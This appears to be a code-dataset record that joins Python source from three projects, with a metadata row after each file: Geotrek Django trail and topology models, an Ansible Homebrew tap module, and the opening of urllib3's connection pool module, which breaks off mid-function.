reversed_coord = self.geom.coords[-1::-1]
self.geom = LineString(reversed_coord)
self.is_reversed = True
return self
def interpolate(self, point):
"""
Returns position ([0.0-1.0]) and offset (distance) of the point
along this path.
"""
return PathHelper.interpolate(self, point)
def snap(self, point):
"""
Returns the point snapped (i.e closest) to the path line geometry.
"""
return PathHelper.snap(self, point)
def reload(self, fromdb=None):
# Update object's computed values (reload from database)
if self.pk and self.visible:
fromdb = self.__class__.objects.get(pk=self.pk)
self.geom = fromdb.geom
AltimetryMixin.reload(self, fromdb)
TimeStampedModelMixin.reload(self, fromdb)
return self
@debug_pg_notices
def save(self, *args, **kwargs):
# If the path was reversed, we have to invert related topologies
if self.is_reversed:
for aggr in self.aggregations.all():
aggr.start_position = 1 - aggr.start_position
aggr.end_position = 1 - aggr.end_position
aggr.save()
self._is_reversed = False
super(Path, self).save(*args, **kwargs)
self.reload()
@property
def name_display(self):
return u'<a data-pk="%s" href="%s" title="%s" >%s</a>' % (self.pk,
self.get_detail_url(),
self,
self)
@property
def name_csv_display(self):
return unicode(self)
@classproperty
def trails_verbose_name(cls):
return _("Trails")
@property
def trails_display(self):
trails = getattr(self, '_trails', self.trails)
if trails:
return ", ".join([t.name_display for t in trails])
return _("None")
@property
def trails_csv_display(self):
trails = getattr(self, '_trails', self.trails)
if trails:
return ", ".join([unicode(t) for t in trails])
return _("None")
@classmethod
def get_create_label(cls):
return _(u"Add a new path")
@property
def checkbox(self):
return u'<input type="checkbox" name="{}[]" value="{}" />'.format('path',
self.pk)
@classproperty
def checkbox_verbose_name(cls):
return _("Action")
@property
def checkbox_display(self):
return self.checkbox
def merge_path(self, path_to_merge):
"""
Path unification
:param path_to path_to_merge: Path instance to merge
:return: Boolean
"""
if (self.pk and path_to_merge) and (self.pk != path_to_merge.pk):
conn = connections[DEFAULT_DB_ALIAS]
cursor = conn.cursor()
sql = "SELECT ft_merge_path({}, {});".format(self.pk, path_to_merge.pk)
cursor.execute(sql)
result = cursor.fetchall()[0][0]
if result:
# reload object after unification
self.reload()
return result
class Topology(AddPropertyMixin, AltimetryMixin, TimeStampedModelMixin, NoDeleteMixin):
paths = models.ManyToManyField(Path, db_column='troncons', through='PathAggregation', verbose_name=_(u"Path"))
offset = models.FloatField(default=0.0, db_column='decallage', verbose_name=_(u"Offset")) # in SRID units
kind = models.CharField(editable=False, verbose_name=_(u"Kind"), max_length=32)
# Override default manager
objects = NoDeleteMixin.get_manager_cls(models.GeoManager)()
geom = models.GeometryField(editable=(not settings.TREKKING_TOPOLOGY_ENABLED),
srid=settings.SRID, null=True,
default=None, spatial_index=False)
""" Fake srid attribute, that prevents transform() calls when using Django map widgets. """
srid = settings.API_SRID
class Meta:
db_table = 'e_t_evenement'
verbose_name = _(u"Topology")
verbose_name_plural = _(u"Topologies")
def __init__(self, *args, **kwargs):
super(Topology, self).__init__(*args, **kwargs)
if not self.pk:
self.kind = self.__class__.KIND
@property
def length_2d(self):
if self.geom and not self.ispoint():
return round(self.geom.length, 1)
else:
return None
@classproperty
def length_2d_verbose_name(cls):
return _(u"2D Length")
@property
def length_2d_display(self):
return self.length_2d
@classproperty
def KIND(cls):
return cls._meta.object_name.upper()
def __unicode__(self):
return u"%s (%s)" % (_(u"Topology"), self.pk)
def ispoint(self):
if not settings.TREKKING_TOPOLOGY_ENABLED or not self.pk:
return self.geom and self.geom.geom_type == 'Point'
return all([a.start_position == a.end_position for a in self.aggregations.all()])
def add_path(self, path, start=0.0, end=1.0, order=0, reload=True):
"""
Shortcut function to add paths into this topology.
"""
from .factories import PathAggregationFactory
aggr = PathAggregationFactory.create(topo_object=self,
path=path,
start_position=start,
end_position=end,
order=order)
if self.deleted:
self.deleted = False
self.save(update_fields=['deleted'])
# Since a trigger modifies geom, we reload the object
if reload:
self.reload()
return aggr
@classmethod
def overlapping(cls, topologies):
""" Return a Topology queryset overlapping specified topologies.
"""
return TopologyHelper.overlapping(cls, topologies)
def mutate(self, other, delete=True):
"""
Take alls attributes of the other topology specified and
save them into this one. Optionnally deletes the other.
"""
self.offset = other.offset
self.save(update_fields=['offset'])
PathAggregation.objects.filter(topo_object=self).delete()
# The previous operation has put deleted = True (in triggers)
# and NULL in geom (see update_geometry_of_evenement:: IF t_count = 0)
self.deleted = False
self.geom = other.geom
self.save(update_fields=['deleted', 'geom'])
# Now copy all agregations from other to self
aggrs = other.aggregations.all()
# A point has only one aggregation, except if it is on an intersection.
# In this case, the trigger will create them, so ignore them here.
if other.ispoint():
aggrs = aggrs[:1]
for aggr in aggrs:
self.add_path(aggr.path, aggr.start_position, aggr.end_position, aggr.order, reload=False)
self.reload()
if delete:
other.delete(force=True) # Really delete it from database
return self
def reload(self, fromdb=None):
"""
Reload into instance all computed attributes in triggers.
"""
if self.pk:
# Update computed values
fromdb = self.__class__.objects.get(pk=self.pk)
self.geom = fromdb.geom
# /!\ offset may be set by a trigger OR in
# the django code, reload() will override
# any unsaved value
self.offset = fromdb.offset
AltimetryMixin.reload(self, fromdb)
TimeStampedModelMixin.reload(self, fromdb)
NoDeleteMixin.reload(self, fromdb)
return self
@debug_pg_notices
def save(self, *args, **kwargs):
# HACK: these fields are readonly from the Django point of view
# but they can be changed at DB level. Since Django write all fields
# to DB anyway, it is important to update it before writting
if self.pk and settings.TREKKING_TOPOLOGY_ENABLED:
existing = self.__class__.objects.get(pk=self.pk)
self.length = existing.length
# In the case of points, the geom can be set by Django. Don't override.
point_geom_not_set = self.ispoint() and self.geom is None
geom_already_in_db = not self.ispoint() and existing.geom is not None
if (point_geom_not_set or geom_already_in_db):
self.geom = existing.geom
else:
if not self.deleted and self.geom is None:
# We cannot have NULL geometry. So we use an empty one,
# it will be computed or overwritten by triggers.
self.geom = fromstr('POINT (0 0)')
if not self.kind:
if self.KIND == "TOPOLOGYMIXIN":
raise Exception("Cannot save abstract topologies")
self.kind = self.__class__.KIND
# Static value for Topology offset, if any
shortmodelname = self._meta.object_name.lower().replace('edge', '')
self.offset = settings.TOPOLOGY_STATIC_OFFSETS.get(shortmodelname, self.offset)
# Save into db
super(Topology, self).save(*args, **kwargs)
self.reload()
def serialize(self, **kwargs):
return TopologyHelper.serialize(self, **kwargs)
@classmethod
def deserialize(cls, serialized):
return TopologyHelper.deserialize(serialized)
def distance(self, to_cls):
"""Distance to associate this topology to another topology class"""
return None
class PathAggregationManager(models.GeoManager):
def get_queryset(self):
return super(PathAggregationManager, self).get_queryset().order_by('order')
class PathAggregation(models.Model):
path = models.ForeignKey(Path, null=False, db_column='troncon',
verbose_name=_(u"Path"),
related_name="aggregations",
on_delete=models.DO_NOTHING) # The CASCADE behavior is enforced at DB-level (see file ../sql/20_evenements_troncons.sql)
topo_object = models.ForeignKey(Topology, null=False, related_name="aggregations",
db_column='evenement', verbose_name=_(u"Topology"))
start_position = models.FloatField(db_column='pk_debut', verbose_name=_(u"Start position"), db_index=True)
end_position = models.FloatField(db_column='pk_fin', verbose_name=_(u"End position"), db_index=True)
order = models.IntegerField(db_column='ordre', default=0, blank=True, null=True, verbose_name=_(u"Order"))
# Override default manager
objects = PathAggregationManager()
def __unicode__(self):
return u"%s (%s-%s: %s - %s)" % (_("Path aggregation"), self.path.pk, self.path.name, self.start_position, self.end_position)
@property
def start_meter(self):
try:
return 0 if self.start_position == 0.0 else int(self.start_position * self.path.length)
except ValueError:
return -1
@property
def end_meter(self):
try:
return 0 if self.end_position == 0.0 else int(self.end_position * self.path.length)
except ValueError:
return -1
@property
def is_full(self):
return (self.start_position == 0.0 and self.end_position == 1.0 or
self.start_position == 1.0 and self.end_position == 0.0)
@debug_pg_notices
def save(self, *args, **kwargs):
return super(PathAggregation, self).save(*args, **kwargs)
class Meta:
db_table = 'e_r_evenement_troncon'
verbose_name = _(u"Path aggregation")
verbose_name_plural = _(u"Path aggregations")
# Important - represent the order of the path in the Topology path list
ordering = ['order', ]
class PathSource(StructureRelated):
source = models.CharField(verbose_name=_(u"Source"), max_length=50)
class Meta:
db_table = 'l_b_source_troncon'
verbose_name = _(u"Path source")
verbose_name_plural = _(u"Path sources")
ordering = ['source']
def __unicode__(self):
return self.source
@functools.total_ordering
class Stake(StructureRelated):
stake = models.CharField(verbose_name=_(u"Stake"), max_length=50, db_column='enjeu')
class Meta:
db_table = 'l_b_enjeu'
verbose_name = _(u"Maintenance stake")
verbose_name_plural = _(u"Maintenance stakes")
ordering = ['id']
def __lt__(self, other):
if other is None:
return False
return self.pk < other.pk
def __eq__(self, other):
return isinstance(other, Stake) \
and self.pk == other.pk
def __unicode__(self):
return self.stake
class Comfort(StructureRelated):
comfort = models.CharField(verbose_name=_(u"Comfort"), max_length=50, db_column='confort')
class Meta:
db_table = 'l_b_confort'
verbose_name = _(u"Comfort")
verbose_name_plural = _(u"Comforts")
ordering = ['comfort']
def __unicode__(self):
return self.comfort
class Usage(StructureRelated):
usage = models.CharField(verbose_name=_(u"Usage"), max_length=50, db_column='usage')
class Meta:
db_table = 'l_b_usage'
verbose_name = _(u"Usage")
verbose_name_plural = _(u"Usages")
ordering = ['usage']
def __unicode__(self):
return self.usage
class Network(StructureRelated):
network = models.CharField(verbose_name=_(u"Network"), max_length=50, db_column='reseau')
class Meta:
db_table = 'l_b_reseau'
verbose_name = _(u"Network")
verbose_name_plural = _(u"Networks")
ordering = ['network']
def __unicode__(self):
return self.network
class Trail(MapEntityMixin, Topology, StructureRelated):
topo_object = models.OneToOneField(Topology, parent_link=True,
db_column='evenement')
name = models.CharField(verbose_name=_(u"Name"), max_length=64, db_column='nom')
departure = models.CharField(verbose_name=_(u"Departure"), max_length=64, db_column='depart')
arrival = models.CharField(verbose_name=_(u"Arrival"), max_length=64, db_column='arrivee')
comments = models.TextField(default="", blank=True, verbose_name=_(u"Comments"), db_column='commentaire')
class Meta:
db_table = 'l_t_sentier'
verbose_name = _(u"Trail")
verbose_name_plural = _(u"Trails")
ordering = ['name']
objects = Topology.get_manager_cls(models.GeoManager)()
def __unicode__(self):
return self.name
@property
def name_display(self):
return u'<a data-pk="%s" href="%s" title="%s" >%s</a>' % (self.pk,
self.get_detail_url(),
self,
self)
@classmethod
def path_trails(cls, path):
return cls.objects.existing().filter(aggregations__path=path)
Path.add_property('trails', lambda self: Trail.path_trails(self), _(u"Trails"))
Topology.add_property('trails', lambda self: Trail.overlapping(self), _(u"Trails"))
| bsd-2-clause | -6,801,243,864,983,624,000 | 35.832442 | 150 | 0.586507 | false |
dispansible/dispansible | ansible/library/disp_homebrew_tap.py | 1 | 5742 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Daniel Jaouen <[email protected]>
# Based on homebrew (Andrew Dunham <[email protected]>)
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import re
DOCUMENTATION = '''
---
module: homebrew_tap
author: Daniel Jaouen
short_description: Tap a Homebrew repository.
description:
- Tap external Homebrew repositories.
version_added: "1.6"
options:
tap:
description:
- The repository to tap.
required: true
state:
description:
- state of the repository.
choices: [ 'present', 'absent' ]
required: false
default: 'present'
requirements: [ homebrew ]
'''
EXAMPLES = '''
homebrew_tap: tap=homebrew/dupes state=present
homebrew_tap: tap=homebrew/dupes state=absent
homebrew_tap: tap=homebrew/dupes,homebrew/science state=present
'''
def a_valid_tap(tap):
'''Returns True if the tap is valid.'''
regex = re.compile(r'^([\w-]+)/(homebrew-)?([\w-]+)$')
return regex.match(tap)
def already_tapped(module, brew_path, tap):
'''Returns True if already tapped.'''
rc, out, err = module.run_command([
brew_path,
'tap',
])
taps = [tap_.strip().lower() for tap_ in out.split('\n') if tap_]
return tap.lower() in taps
def add_tap(module, brew_path, tap):
'''Adds a single tap.'''
failed, changed, msg = False, False, ''
if not a_valid_tap(tap):
failed = True
msg = 'not a valid tap: %s' % tap
elif not already_tapped(module, brew_path, tap):
if module.check_mode:
module.exit_json(changed=True)
rc, out, err = module.run_command([
brew_path,
'tap',
tap,
])
if already_tapped(module, brew_path, tap):
changed = True
msg = 'successfully tapped: %s' % tap
else:
failed = True
msg = 'failed to tap: %s' % tap
else:
msg = 'already tapped: %s' % tap
return (failed, changed, msg)
def add_taps(module, brew_path, taps):
'''Adds one or more taps.'''
failed, unchanged, added, msg = False, 0, 0, ''
for tap in taps:
(failed, changed, msg) = add_tap(module, brew_path, tap)
if failed:
break
if changed:
added += 1
else:
unchanged += 1
if failed:
msg = 'added: %d, unchanged: %d, error: ' + msg
msg = msg % (added, unchanged)
elif added:
changed = True
msg = 'added: %d, unchanged: %d' % (added, unchanged)
else:
msg = 'added: %d, unchanged: %d' % (added, unchanged)
return (failed, changed, msg)
def remove_tap(module, brew_path, tap):
'''Removes a single tap.'''
failed, changed, msg = False, False, ''
if not a_valid_tap(tap):
failed = True
msg = 'not a valid tap: %s' % tap
elif already_tapped(module, brew_path, tap):
if module.check_mode:
module.exit_json(changed=True)
rc, out, err = module.run_command([
brew_path,
'untap',
tap,
])
if not already_tapped(module, brew_path, tap):
changed = True
msg = 'successfully untapped: %s' % tap
else:
failed = True
msg = 'failed to untap: %s' % tap
else:
msg = 'already untapped: %s' % tap
return (failed, changed, msg)
def remove_taps(module, brew_path, taps):
'''Removes one or more taps.'''
failed, unchanged, removed, msg = False, 0, 0, ''
for tap in taps:
(failed, changed, msg) = remove_tap(module, brew_path, tap)
if failed:
break
if changed:
removed += 1
else:
unchanged += 1
if failed:
msg = 'removed: %d, unchanged: %d, error: ' + msg
msg = msg % (removed, unchanged)
elif removed:
changed = True
msg = 'removed: %d, unchanged: %d' % (removed, unchanged)
else:
msg = 'removed: %d, unchanged: %d' % (removed, unchanged)
return (failed, changed, msg)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(aliases=['tap'], required=True),
state=dict(default='present', choices=['present', 'absent']),
),
supports_check_mode=True,
)
brew_path = module.get_bin_path(
'brew',
required=True,
opt_dirs=['/usr/local/bin', '~/.linuxbrew/bin']
)
taps = module.params['name'].split(',')
if module.params['state'] == 'present':
failed, changed, msg = add_taps(module, brew_path, taps)
if failed:
module.fail_json(msg=msg)
else:
module.exit_json(changed=changed, msg=msg)
elif module.params['state'] == 'absent':
failed, changed, msg = remove_taps(module, brew_path, taps)
if failed:
module.fail_json(msg=msg)
else:
module.exit_json(changed=changed, msg=msg)
# this is magic, see lib/ansible/module_common.py
#<<INCLUDE_ANSIBLE_MODULE_COMMON>>
main()
| mit | -3,955,033,150,162,051,600 | 25.706977 | 73 | 0.575235 | false |
tuxfux-hlp-notes/python-batches | archieves/batch-62/files/myenv/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/connectionpool.py | 359 | 33591 | from __future__ import absolute_import
import errno
import logging
import sys
import warnings
from socket import error as SocketError, timeout as SocketTimeout
import socket
try: # Python 3
from queue import LifoQueue, Empty, Full
except ImportError:
from Queue import LifoQueue, Empty, Full
# Queue is imported for side effects on MS Windows
import Queue as _unused_module_Queue # noqa: unused
from .exceptions import (
ClosedPoolError,
ProtocolError,
EmptyPoolError,
HeaderParsingError,
HostChangedError,
LocationValueError,
MaxRetryError,
ProxyError,
ReadTimeoutError,
SSLError,
TimeoutError,
InsecureRequestWarning,
NewConnectionError,
)
from .packages.ssl_match_hostname import CertificateError
from .packages import six
from .connection import (
port_by_scheme,
DummyConnection,
HTTPConnection, HTTPSConnection, VerifiedHTTPSConnection,
HTTPException, BaseSSLError,
)
from .request import RequestMethods
from .response import HTTPResponse
from .util.connection import is_connection_dropped
from .util.response import assert_header_parsing
from .util.retry import Retry
from .util.timeout import Timeout
from .util.url import get_host, Url
xrange = six.moves.xrange
log = logging.getLogger(__name__)
_Default = object()
# Pool objects
class ConnectionPool(object):
"""
Base class for all connection pools, such as
:class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`.
"""
scheme = None
QueueCls = LifoQueue
def __init__(self, host, port=None):
if not host:
raise LocationValueError("No host specified.")
# httplib doesn't like it when we include brackets in ipv6 addresses
# Specifically, if we include brackets but also pass the port then
# httplib crazily doubles up the square brackets on the Host header.
# Instead, we need to make sure we never pass ``None`` as the port.
# However, for backward compatibility reasons we can't actually
# *assert* that.
self.host = host.strip('[]')
self.port = port
def __str__(self):
return '%s(host=%r, port=%r)' % (type(self).__name__,
self.host, self.port)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Return False to re-raise any potential exceptions
return False
def close(self):
"""
Close all pooled connections and disable the pool.
"""
pass
# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
_blocking_errnos = set([errno.EAGAIN, errno.EWOULDBLOCK])
class HTTPConnectionPool(ConnectionPool, RequestMethods):
"""
Thread-safe connection pool for one host.
:param host:
Host used for this HTTP Connection (e.g. "localhost"), passed into
:class:`httplib.HTTPConnection`.
:param port:
Port used for this HTTP Connection (None is equivalent to 80), passed
into :class:`httplib.HTTPConnection`.
:param strict:
Causes BadStatusLine to be raised if the status line can't be parsed
as a valid HTTP/1.0 or 1.1 status line, passed into
:class:`httplib.HTTPConnection`.
.. note::
Only works in Python 2. This parameter is ignored in Python 3.
:param timeout:
Socket timeout in seconds for each individual connection. This can
be a float or integer, which sets the timeout for the HTTP request,
or an instance of :class:`urllib3.util.Timeout` which gives you more
fine-grained control over request timeouts. After the constructor has
been parsed, this is always a `urllib3.util.Timeout` object.
:param maxsize:
Number of connections to save that can be reused. More than 1 is useful
in multithreaded situations. If ``block`` is set to False, more
connections will be created but they will not be saved once they've
been used.
:param block:
If set to True, no more than ``maxsize`` connections will be used at
a time. When no free connections are available, the call will block
until a connection has been released. This is a useful side effect for
particular multithreaded situations where one does not want to use more
than maxsize connections per host to prevent flooding.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param retries:
Retry configuration to use by default with requests in this pool.
:param _proxy:
Parsed proxy URL, should not be used directly, instead, see
:class:`urllib3.connectionpool.ProxyManager`"
:param _proxy_headers:
A dictionary with proxy headers, should not be used directly,
instead, see :class:`urllib3.connectionpool.ProxyManager`"
:param \**conn_kw:
Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`,
:class:`urllib3.connection.HTTPSConnection` instances.
"""
scheme = 'http'
ConnectionCls = HTTPConnection
ResponseCls = HTTPResponse
def __init__(self, host, port=None, strict=False,
timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1, block=False,
headers=None, retries=None,
_proxy=None, _proxy_headers=None,
**conn_kw):
ConnectionPool.__init__(self, host, port)
RequestMethods.__init__(self, headers)
self.strict = strict
if not isinstance(timeout, Timeout):
timeout = Timeout.from_float(timeout)
if retries is None:
retries = Retry.DEFAULT
self.timeout = timeout
self.retries = retries
self.pool = self.QueueCls(maxsize)
self.block = block
self.proxy = _proxy
self.proxy_headers = _proxy_headers or {}
# Fill the queue up so that doing get() on it will block properly
for _ in xrange(maxsize):
self.pool.put(None)
# These are mostly for testing and debugging purposes.
self.num_connections = 0
self.num_requests = 0
self.conn_kw = conn_kw
if self.proxy:
# Enable Nagle's algorithm for proxies, to avoid packet fragmentation.
# We cannot know if the user has added default socket options, so we cannot replace the
# list.
self.conn_kw.setdefault('socket_options', [])
def _new_conn(self):
"""
Return a fresh :class:`HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s",
self.num_connections, self.host)
conn = self.ConnectionCls(host=self.host, port=self.port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return conn
def _get_conn(self, timeout=None):
"""
Get a connection. Will return a pooled connection if one is available.
If no connections are available and :prop:`.block` is ``False``, then a
fresh connection is returned.
:param timeout:
Seconds to wait before giving up and raising
:class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and
:prop:`.block` is ``True``.
"""
conn = None
try:
conn = self.pool.get(block=self.block, timeout=timeout)
except AttributeError: # self.pool is None
raise ClosedPoolError(self, "Pool is closed.")
except Empty:
if self.block:
raise EmptyPoolError(self,
"Pool reached maximum size and no more "
"connections are allowed.")
pass # Oh well, we'll create a new connection then
# If this is a persistent connection, check if it got disconnected
if conn and is_connection_dropped(conn):
log.info("Resetting dropped connection: %s", self.host)
conn.close()
if getattr(conn, 'auto_open', 1) == 0:
# This is a proxied connection that has been mutated by
# httplib._tunnel() and cannot be reused (since it would
# attempt to bypass the proxy)
conn = None
return conn or self._new_conn()
def _put_conn(self, conn):
"""
Put a connection back into the pool.
:param conn:
Connection object for the current host and port as returned by
:meth:`._new_conn` or :meth:`._get_conn`.
If the pool is already full, the connection is closed and discarded
because we exceeded maxsize. If connections are discarded frequently,
then maxsize should be increased.
If the pool is closed, then the connection will be closed and discarded.
"""
try:
self.pool.put(conn, block=False)
return # Everything is dandy, done.
except AttributeError:
# self.pool is None.
pass
except Full:
# This should never happen if self.block == True
log.warning(
"Connection pool is full, discarding connection: %s",
self.host)
# Connection never got put back into the pool, close it.
if conn:
conn.close()
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
pass
def _prepare_proxy(self, conn):
# Nothing to do for HTTP connections.
pass
def _get_timeout(self, timeout):
""" Helper that always returns a :class:`urllib3.util.Timeout` """
if timeout is _Default:
return self.timeout.clone()
if isinstance(timeout, Timeout):
return timeout.clone()
else:
# User passed us an int/float. This is for backwards compatibility,
# can be removed later
return Timeout.from_float(timeout)
def _raise_timeout(self, err, url, timeout_value):
"""Is the error actually a timeout? Will raise a ReadTimeout or pass"""
if isinstance(err, SocketTimeout):
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# See the above comment about EAGAIN in Python 3. In Python 2 we have
# to specifically catch it and throw the timeout error
if hasattr(err, 'errno') and err.errno in _blocking_errnos:
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# Catch possible read timeouts thrown as SSL errors. If not the
# case, rethrow the original. We need to do this because of:
# http://bugs.python.org/issue10272
if 'timed out' in str(err) or 'did not complete (read)' in str(err): # Python 2.6
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
def _make_request(self, conn, method, url, timeout=_Default, chunked=False,
**httplib_request_kw):
"""
Perform a request on a given urllib connection object taken from our
pool.
:param conn:
a connection from one of our connection pools
:param timeout:
Socket timeout in seconds for the request. This can be a
float or integer, which will set the same timeout value for
the socket connect and the socket read, or an instance of
:class:`urllib3.util.Timeout`, which gives you more fine-grained
control over your timeouts.
"""
self.num_requests += 1
timeout_obj = self._get_timeout(timeout)
timeout_obj.start_connect()
conn.timeout = timeout_obj.connect_timeout
# Trigger any extra validation we need to do.
try:
self._validate_conn(conn)
except (SocketTimeout, BaseSSLError) as e:
# Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout.
self._raise_timeout(err=e, url=url, timeout_value=conn.timeout)
raise
# conn.request() calls httplib.*.request, not the method in
# urllib3.request. It also calls makefile (recv) on the socket.
if chunked:
conn.request_chunked(method, url, **httplib_request_kw)
else:
conn.request(method, url, **httplib_request_kw)
# Reset the timeout for the recv() on the socket
read_timeout = timeout_obj.read_timeout
# App Engine doesn't have a sock attr
if getattr(conn, 'sock', None):
# In Python 3 socket.py will catch EAGAIN and return None when you
# try and read into the file pointer created by http.client, which
# instead raises a BadStatusLine exception. Instead of catching
# the exception and assuming all BadStatusLine exceptions are read
# timeouts, check for a zero timeout before making the request.
if read_timeout == 0:
raise ReadTimeoutError(
self, url, "Read timed out. (read timeout=%s)" % read_timeout)
if read_timeout is Timeout.DEFAULT_TIMEOUT:
conn.sock.settimeout(socket.getdefaulttimeout())
else: # None or a value
conn.sock.settimeout(read_timeout)
# Receive the response from the server
try:
try: # Python 2.7, use buffering of HTTP responses
httplib_response = conn.getresponse(buffering=True)
except TypeError: # Python 2.6 and older, Python 3
try:
httplib_response = conn.getresponse()
except Exception as e:
# Remove the TypeError from the exception chain in Python 3;
# otherwise it looks like a programming error was the cause.
six.raise_from(e, None)
except (SocketTimeout, BaseSSLError, SocketError) as e:
self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
raise
# AppEngine doesn't have a version attr.
http_version = getattr(conn, '_http_vsn_str', 'HTTP/?')
log.debug("\"%s %s %s\" %s %s", method, url, http_version,
httplib_response.status, httplib_response.length)
try:
assert_header_parsing(httplib_response.msg)
except HeaderParsingError as hpe: # Platform-specific: Python 3
log.warning(
'Failed to parse headers (url=%s): %s',
self._absolute_url(url), hpe, exc_info=True)
return httplib_response
def _absolute_url(self, path):
return Url(scheme=self.scheme, host=self.host, port=self.port, path=path).url
def close(self):
"""
Close all pooled connections and disable the pool.
"""
# Disable access to the pool
old_pool, self.pool = self.pool, None
try:
while True:
conn = old_pool.get(block=False)
if conn:
conn.close()
except Empty:
pass # Done.
def is_same_host(self, url):
"""
Check if the given ``url`` is a member of the same host as this
connection pool.
"""
if url.startswith('/'):
return True
# TODO: Add optional support for socket.gethostbyname checking.
scheme, host, port = get_host(url)
# Use explicit default port for comparison when none is given
if self.port and not port:
port = port_by_scheme.get(scheme)
elif not self.port and port == port_by_scheme.get(scheme):
port = None
return (scheme, host, port) == (self.scheme, self.host, self.port)
def urlopen(self, method, url, body=None, headers=None, retries=None,
redirect=True, assert_same_host=True, timeout=_Default,
pool_timeout=None, release_conn=None, chunked=False,
**response_kw):
"""
Get a connection from the pool and perform an HTTP request. This is the
lowest level call for making a request, so you'll need to specify all
the raw details.
.. note::
More commonly, it's appropriate to use a convenience method provided
by :class:`.RequestMethods`, such as :meth:`request`.
.. note::
`release_conn` will only behave as expected if
`preload_content=False` because we want to make
`preload_content=False` the default behaviour someday soon without
breaking backwards compatibility.
:param method:
HTTP request method (such as GET, POST, PUT, etc.)
:param body:
Data to send in the request body (useful for creating
POST requests, see HTTPConnectionPool.post_url for
more convenience).
:param headers:
Dictionary of custom headers to send, such as User-Agent,
If-None-Match, etc. If None, pool headers are used. If provided,
these headers completely replace any pool-specific headers.
:param retries:
Configure the number of retries to allow before raising a
:class:`~urllib3.exceptions.MaxRetryError` exception.
Pass ``None`` to retry until you receive a response. Pass a
:class:`~urllib3.util.retry.Retry` object for fine-grained control
over different types of retries.
Pass an integer number to retry connection errors that many times,
but no other types of errors. Pass zero to never retry.
If ``False``, then retries are disabled and any exception is raised
immediately. Also, instead of raising a MaxRetryError on redirects,
the redirect response will be returned.
:type retries: :class:`~urllib3.util.retry.Retry`, False, or an int.
:param redirect:
If True, automatically handle redirects (status codes 301, 302,
303, 307, 308). Each redirect counts as a retry. Disabling retries
will disable redirect, too.
:param assert_same_host:
If ``True``, will make sure that the host of the pool requests is
consistent else will raise HostChangedError. When False, you can
use the pool on an HTTP proxy and request foreign hosts.
:param timeout:
If specified, overrides the default timeout for this one
request. It may be a float (in seconds) or an instance of
:class:`urllib3.util.Timeout`.
:param pool_timeout:
If set and the pool is set to block=True, then this method will
block for ``pool_timeout`` seconds and raise EmptyPoolError if no
connection is available within the time period.
:param release_conn:
If False, then the urlopen call will not release the connection
back into the pool once a response is received (but will release if
you read the entire contents of the response such as when
`preload_content=True`). This is useful if you're not preloading
the response's content immediately. You will need to call
``r.release_conn()`` on the response ``r`` to return the connection
back into the pool. If None, it takes the value of
``response_kw.get('preload_content', True)``.
:param chunked:
If True, urllib3 will send the body using chunked transfer
encoding. Otherwise, urllib3 will send the body using the standard
content-length form. Defaults to False.
:param \**response_kw:
Additional parameters are passed to
:meth:`urllib3.response.HTTPResponse.from_httplib`
"""
if headers is None:
headers = self.headers
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect, default=self.retries)
if release_conn is None:
release_conn = response_kw.get('preload_content', True)
# Check host
if assert_same_host and not self.is_same_host(url):
raise HostChangedError(self, url, retries)
conn = None
# Track whether `conn` needs to be released before
# returning/raising/recursing. Update this variable if necessary, and
# leave `release_conn` constant throughout the function. That way, if
# the function recurses, the original value of `release_conn` will be
# passed down into the recursive call, and its value will be respected.
#
# See issue #651 [1] for details.
#
# [1] <https://github.com/shazow/urllib3/issues/651>
release_this_conn = release_conn
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
if self.scheme == 'http':
headers = headers.copy()
headers.update(self.proxy_headers)
# Must keep the exception bound to a separate variable or else Python 3
# complains about UnboundLocalError.
err = None
# Keep track of whether we cleanly exited the except block. This
# ensures we do proper cleanup in finally.
clean_exit = False
try:
# Request a connection from the queue.
timeout_obj = self._get_timeout(timeout)
conn = self._get_conn(timeout=pool_timeout)
conn.timeout = timeout_obj.connect_timeout
is_new_proxy_conn = self.proxy is not None and not getattr(conn, 'sock', None)
if is_new_proxy_conn:
self._prepare_proxy(conn)
# Make the request on the httplib connection object.
httplib_response = self._make_request(conn, method, url,
timeout=timeout_obj,
body=body, headers=headers,
chunked=chunked)
# If we're going to release the connection in ``finally:``, then
# the response doesn't need to know about the connection. Otherwise
# it will also try to release it and we'll have a double-release
# mess.
response_conn = conn if not release_conn else None
# Import httplib's response into our own wrapper object
response = self.ResponseCls.from_httplib(httplib_response,
pool=self,
connection=response_conn,
**response_kw)
# Everything went great!
clean_exit = True
except Empty:
# Timed out by queue.
raise EmptyPoolError(self, "No pool connections are available.")
except (BaseSSLError, CertificateError) as e:
# Close the connection. If a connection is reused on which there
# was a Certificate error, the next request will certainly raise
# another Certificate error.
clean_exit = False
raise SSLError(e)
except SSLError:
# Treat SSLError separately from BaseSSLError to preserve
# traceback.
clean_exit = False
raise
